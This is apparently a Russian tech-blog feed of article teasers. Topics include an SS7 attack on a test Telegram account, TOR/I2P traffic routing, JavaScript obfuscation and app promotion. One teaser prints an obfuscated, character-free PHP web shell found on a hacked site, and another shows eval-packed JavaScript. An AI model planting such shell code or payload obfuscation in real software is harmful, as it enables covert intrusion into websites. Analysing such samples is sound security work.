• Как взломать Telegram и WhatsApp: спецслужбы не нужны

      На прошлой неделе общественность взбудоражила новость о возможной причастности спецслужб к взлому аккаунтов оппозиционеров в популярном мессенджере Telegram. На протяжении своего существования человечество пыталось объяснить всё необъяснимое с помощью высших сил – Богов. В наше время все непонятные вещи объясняют происками спецслужб.

      Мы решили проверить, действительно ли нужно быть спецслужбой, чтобы получить доступ к чужому аккаунту Telegram. Для этого мы зарегистрировали тестовый аккаунт Telegram, обменялись несколькими тестовыми сообщениями:



      А затем мы провели атаку через сеть SS7 на один из тестовых номеров (подробнее о самих атаках мы писали ранее). И вот что у нас получилось:
      Читать дальше →
    • Сервисы для проверки навыков тестирования на проникновение



        В прошлом топике я опубликовал обзор дистрибутива PentestBox со ссылками и описанием входящих в него утилит. Надеюсь вам хватило времени ознакомиться с ними и изучить функционал. Сегодня я предлагаю вам несколько сервисов для тестирования своих навыков на практике. Это специализированные сервисы, абсолютно легальные и позволяющие всем желающим проверить свои знания и умения.
        Читать дальше →
        • +27
        • 73,5k
        • 3
      • Как работает мозг?

          Этот пост написан по мотивам лекции Джеймса Смита, профессора Висконсинского университета в Мадисоне, специализирующегося в микроэлектронике и архитектуре вычислительных машин.

          История компьютерных наук в целом сводится к тому, что учёные пытаются понять, как работает человеческий мозг, и воссоздать нечто аналогичное по своим возможностям. Как именно учёные его исследуют? Представим, что в XXI веке на Землю прилетают инопланетяне, никогда не видевшие привычных нам компьютеров, и пытаются исследовать устройство такого компьютера. Скорее всего, они начнут с измерения напряжений на проводниках, и обнаружат, что данные передаются в двоичном виде: точное значение напряжения не важно, важно только его наличие либо отсутствие. Затем, возможно, они поймут, что все электронные схемы составлены из одинаковых «логических вентилей», у которых есть вход и выход, и сигнал внутри схемы всегда передаётся в одном направлении. Если инопланетяне достаточно сообразительные, то они смогут разобраться, как работают комбинационные схемы — одних их достаточно, чтобы построить сравнительно сложные вычислительные устройства. Может быть, инопланетяне разгадают роль тактового сигнала и обратной связи; но вряд ли они смогут, изучая современный процессор, распознать в нём фон-неймановскую архитектуру с общей памятью, счётчиком команд, набором регистров и т.п. Дело в том, что по итогам сорока лет погони за производительностью в процессорах появилась целая иерархия «памятей» с хитроумными протоколами синхронизации между ними; несколько параллельных конвейеров, снабжённых предсказателями переходов, так что понятие «счётчика команд» фактически теряет смысл; с каждой командой связано собственное содержимое регистров, и т.д. Для реализации микропроцессора достаточно нескольких тысяч транзисторов; чтобы его производительность достигла привычного нам уровня, требуются сотни миллионов. Смысл этого примера в том, что для ответа на вопрос «как работает компьютер?» не нужно разбираться в работе сотен миллионов транзисторов: они лишь заслоняют собой простую идею, лежащую в основе архитектуры наших ЭВМ.

          Моделирование нейронов


          Кора человеческого мозга состоит из порядка ста миллиардов нейронов. Исторически сложилось так, что учёные, исследующие работу мозга, пытались охватить своей теорией всю эту колоссальную конструкцию. Строение мозга описано иерархически: кора состоит из долей, доли — из «гиперколонок», те — из «миниколонок»… Миниколонка состоит из примерно сотни отдельных нейронов.



          По аналогии с устройством компьютера, абсолютное большинство этих нейронов нужны для скорости и эффективности работы, для устойчивости ко сбоям, и т.п.; но основные принципы устройства мозга так же невозможно обнаружить при помощи микроскопа, как невозможно обнаружить счётчик команд, рассматривая под микроскопом микропроцессор. Поэтому более плодотворный подход — попытаться понять устройство мозга на самом низком уровне, на уровне отдельных нейронов и их колонок; и затем, опираясь на их свойства — попытаться предположить, как мог бы работать мозг целиком. Примерно так пришельцы, поняв работу логических вентилей, могли бы со временем составить из них простейший процессор, — и убедиться, что он эквивалентен по своим способностям настоящим процессорам, даже хотя те намного сложнее и мощнее.
          Читать дальше →
        • 300 потрясающих бесплатных сервисов

          • Перевод


          Автор оригинальной статьи Ali Mese добавил ещё 100 новых бесплатных сервисов. Все 400 потрясающих сервисов доступны здесь. И еще подборку +500 инструментов от 10 марта 2017 г. смотрите здесь.



          A. Бесплатные Веб-Сайты + Логотипы + Хостинг + Выставление Счета

          • HTML5 UP: Адаптивные шаблоны HTML5 и CSS3.
          • Bootswatch: Бесплатные темы для Bootstrap.
          • Templated: Коллекция 845 бесплатных шаблонов CSS и HTML5.
          • Wordpress.org | Wordpress.com: Бесплатное создание веб-сайта.
          • Strikingly.com Domain: Конструктор веб-сайтов.
          • Logaster: Онлайн генератор логотипов и элементов фирменного стиля (new).
          • Withoomph: Мгновенное создание логотипов (англ.).
          • Hipster Logo Generator: Генератор хипстерских логотипов.
          • Squarespace Free Logo: Можно скачать бесплатную версию в маленьком разрешении.
          • Invoice to me: Бесплатный генератор счета.
          • Free Invoice Generator: Альтернативный бесплатный генератор счета.
          • Slimvoice: Невероятно простой счет.

          Читать дальше →
        • GNU Emacs. Статья, которую я так и не нашел…

          Доброго времени суток, Читатель!

          В данной статье хочу подробно рассказать про настройку текстового редактора GNU Emacs.

          Операционная система GNU Emacs — программируемый текстовый редактор для программистов, написанный на программируемом языке программирования.

          Для расширения Emacs используется диалект языка LispEmacs Lisp.
          Читать дальше →
        • Прекратите скручивать (восклицательный знак)

          • Tutorial
          Ну действительно, прекратите. Есть куча прикольных штук для соединения самых разнообразных проводов, а все равно технология «откусить зубами изоляцию, скрутить, замотать изолентой» жива до сих пор.

          Дальше много текста, фотографий, разборок. Ну все как обычно
        • Анонимизация всего траффика через VPN + TOR/I2P. Собираем миддлбокс с нуля

            В этой статье будет рассказано, как пробросить весь трафик операционной системы через TOR так, чтобы о наличии TOR-а операционная система даже не подозревала.



            Это поможет не думать о бесконечных настройках прокси и onion, перестать бояться на тему «а не сливает ли торрент клиент мой реальный IP адрес, так как не полностью поддерживает прокси?» и, наконец, быть застрахованным от законодательного запрета TOR-а в России.

            Когда я говорю «TOR», я подразумеваю «TOR и I2P». По схожей методике сюда можно подключить любой даркнет.

            Статья — «чисто конкретная». Теория уже неплохо изложена в статье Pandoshabrahabr.ru/post/204266. В данном тексте будет дана детальная инструкция «как сделать, чтобы работало».

            Постановка задачи


            1. Мой компьютер должен по нажатию одной кнопки переходить в режим «весь трафик — не русский».

            2. По нажатию второй кнопки он должен переходить в режим «весь траффик идет через TOR»

            3. Третья кнопка — для I2P.

            4. Входная TOR-нода должна находиться за рубежом.

            5. Все это должно работать под linux, windows, android. Заранее: с OS X и iPhone тоже все в порядке, просто у меня их нету, так что протестить не смогу.
            Далее
          • Жизнь разработчика (в картинках)

              Взято отсюда специально для хабра. Возможно, в некоторых из ситуаций вы узнаете себя.

              Когда я показываю босу, что окончательно пофиксил баг



              Когда проджект-менеджер входит в офис



              Читать дальше →
            • Прием КВ на RTL-SDR, бесплатно без конвертера



              После прочтения статьи о дешевом SDR из ТВ-тюнера я сразу же кинулся заказывать донгл на R820T. Но всё омрачал факт невозможности приема на коротких волнах, ибо в моем городе на УКВ нет ничего интересного: пара-тройка такси, скорая и изредка появляющиеся радиолюбители. После недолгих поисков я наткнулся на несколько методов «раскрытия» тюнера на 0-15МГц без использования относительно недешевых upconverter-ов.
              Читать дальше →
            • Распараллеливаем процессы для ускорения вычислений и выполнения заданий в Linux



                Почти все персональные компьютеры, выпущенные за последние несколько лет, обладают как минимум двухъядерным процессором. Если у тебя, читатель, не очень старый комп или не какой-нибудь бюджетный ноутбук, то, вероятнее всего, ты обладатель многопроцессорной системы. А если еще любишь играть в игры, то тебе доступно около сотни GPU-ядер. Однако львиную долю времени вся эта мощь пылится без дела. Попробуем это исправить.
                Подробности
              • SoftEther VPN — продвинутый мультипротокольный VPN-сервер и клиент

                  Как скоро я смогу вас заинтересовать, если скажу, что в этой статье речь пойдет о VPN-сервере, который может поднимать L2TP/IPsec, OpenVPN, MS-SSTP, L2TPv3, EtherIP-серверы, а также имеет свой собственный протокол «SSL-VPN», который неотличим от обычного HTTPS-трафика (чего не скажешь про OpenVPN handshake, например), может работать не только через TCP/UDP, но и через ICMP (подобно pingtunnel, hanstunnel) и DNS (подобно iodine), работает быстрее (по заверению разработчиков) текущих имплементаций, строит L2 и L3 туннели, имеет встроенный DHCP-сервер, поддерживает как kernel-mode, так и user-mode NAT, IPv6, шейпинг, QoS, кластеризацию, load balancing и fault tolerance, может быть запущен под Windows, Linux, Mac OS, FreeBSD и Solaris и является Open-Source проектом под GPLv2?

                  То-то и оно. Такое пропустить нельзя.
                  Читать дальше →
                • Десятка лучших консольных команд

                    imageВ данном посте я расскажу о наиболее интересных командах, которые могут быть очень полезны при работе в консоли. Однозначных критериев определения какая команда лучше другой — нет, каждый сам для своих условий выбирает лучшее. Я решил построить список команд на основе наиболее рейтинговых приемов работы с консолью от commandlinefu.com, кладовой консольных команд. Результат выполнения одной из таких команд под Linux приведен на картинке. Если заинтересовало, прошу под кат.
                    Узнать больше
                  • Тонкая настройка Synaptics Touchpad

                      Synaptics производит отличные тачпады: они отзывчивы, обладают мультитачем и, что самое главное, их можно долго и нудно легко и просто настраивать под свои ловкие пальчики.

                      Вот только одна незадачка: вся эта прелесть прекрасно работает в Windows 7, в то время как в Linux как всегда лишь унылые огрызки, и наполовину не использующие все свои возможности.

                      Бесстрашный Хабраюзер, готов ли ты бороться со вселенской несправедливостью? Тогда добро пожаловать под хабракат, тебя ждет море удовольствия, linux-way и миллионы счастливых кликов на выходе :)
                      Читать дальше →
                    • Обфускация JavaScript

                        В статье собраны всем известные методы и предельно извращенные. Эту статью я решил написать после недавнего прочтения поста в блоге Badass JavaScript и решил её дополнить своими находками.

                        Первый способ


                        Он всем известен — обфускация минимизаторами такими как JS Packer, JSmin, YUI Compressor, Closure compiler или можно просто пугуглить «JavaScript Obfuscator» и найдется ещё сто штук разных обфускаторов.
                        Они превращают существующий код
                        function MyClass(){
                            this.foo = function(argument1, argument2){
                                var addedArgs = parseInt(argument1)+parseInt(argument2);
                                return addedArgs;
                            }
                            var anonymousInnerFunction = function(){
                                // do stuff here!
                            }
                        }

                        В какой-то такой вид:
                        function MyClass(){this.foo=function(c,b){var d=parseInt(c)+parseInt(b);return d};var a=function(){}};

                        Или такой:
                        var _0xd799=["\x66\x6F\x6F"];function MyClass(){this[_0xd799[0]]=function (_0xefcax2,_0xefcax3){var _0xefcax4=parseInt(_0xefcax2)+parseInt(_0xefcax3);return _0xefcax4;} ;var _0xefcax5=function (){} ;} ;

                        Или вот такой:
                        eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4 0="3 5!";9 2(1){6(1+"\\7"+0)}2("8");',10,10,'a|msg|MsgBox|Hello|var|World|alert|n|OK|function'.split('|'),0,{}))

                        Но ничего не стоит его восстановить с помощью jsbeautifier.org либо просто убрать eval и получить исходный код, многое потеряем, но смысл кода восстановим. Ну и с первого взгляда мы видим, что перед нами JavaScript.

                        Все это были цветочки под катом жесткие методы обфускации.
                        Читать дальше →
                      • PHP-шелл без единого буквенно-цифрового символа

                          Вчера в блоге компании Sucuri появился любопытный вопрос: некий владелец сайта, обнаружив его взломанным, был немало удивлён, обнаружив следующий злонамеренный код; что именно он делает?
                          @$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
                          $_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
                          $_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
                          $_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
                          $_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
                          $_=$ 
                          $_[$__+ $__] ;$_[@-_]($_[@!+_] );
                          

                          Как видно, в коде нет ни вызовов функций, ни вообще какого-либо буквенно-цифрового символа.
                          Узнать подробности
                        • Case story o продвижении игры собственными силами в топы US App Store

                            В данной статье мы хотим рассказать про стратегию и тактику вывода на US рынок нашей f2p игры жанра Tower Defense (TD). Озвучим бюджеты, поделимся открытиями, проанализируем ошибки. Релиз игры состоялся год назад.

                            Для «затравки» достижения игры в App Store:
                            1. побывала в топ6 и топ7 своих категорий в US;
                            2. фичеринг в New&Noteworthy в 68 странах;
                            3. около 500 000 закачек;
                            4. «письмо счастья» от Apple;
                            5. 5 звезд — средняя оценка для всех магазинов в течение полугода;
                            6. обзоры на ведущих международных мобильных порталах.


                            Читать дальше →
                          • Google: альтернативы поисковому гиганту

                              Google постоянно работает над новшествам и улучшениям своих сервисов. Только за последние несколько недель компания добавила возможность автоматической коррекции изображений при загрузке в Google+, запустила сеть воздушных шаров для обеспечения доступа к интернету в местах со слабо развитой инфраструктурой, открыла доступ к новому сервису подписки на музыку и обновила сервис карт.

                              Но пока компания отчитывается о последних доходах и достижениях, инвесторы заинтересованы лишь в одной вещи — показателями доходов от контекстной рекламы компании
                              Читать дальше →
                            • Можно ли бесплатно попасть в «топ» App Store и что делать, если бесплатно это сделать не получилось

                                Для тех, кто не любит много читать и хочет знать все ответы сразу — напишу в первых строках этой небольшой статьи, что, по моему скромному опыту, в «топ» App Store попасть ужасно трудно, и для этого требуется приложить недюжинные усилия. Более того, скажу вам, что крупные издатели вылезают в «топ» именно за счет налаженной работы с журналистами, блогерами и всевозможными порталами пишущими про мобильные приложения, ну и разумеется за счет четко налаженной системы маркетинга приложений, направленной на увеличение количества скачиваний. Чуть легче «запихнуть» в топ бесплатное приложение, это разумеется при условии, что Apple его заметит и поставит в «New & Noteworthy» (Новое и Заслуживающее внимания) в App Store. Ну а теперь обо всем по порядку.
                                Читать дальше →
                              • Продвижение мобильного приложения: с чего начать

                                Скажем откровенно, сделать хорошее мобильное приложение не так уж и просто. И вы нигде не найдете готового рецепта, который поможет в этом. Но, провести рекламную кампанию, которая поможет получить много установок и даже выйти в топ, вполне реально.
                                Есть свои особенности продвижения Android и iOS приложений. Но в данном посте я хочу затронуть именно общие этапы.

                                Итак, с чего начать?



                                Продвижение начинается до публикации приложения. Прежде чем приложение опубликовано, надо подготовить сайт, пресс-релиз, пресс-кит, видео, сообщества в социальных сетях. Не обязательно использовать все из вышеперечисленного. Но обязательно нужно обеспечить какое-то онлайн присутствие (информация о приложении, возможность связаться с разработчиком, информация для журналистов). На этом же этапе связываемся с прессой и договариваемся о публикации релиза или обзора приложения.

                                Немного подробнее остановимся на каждом пункте.
                                Читать дальше →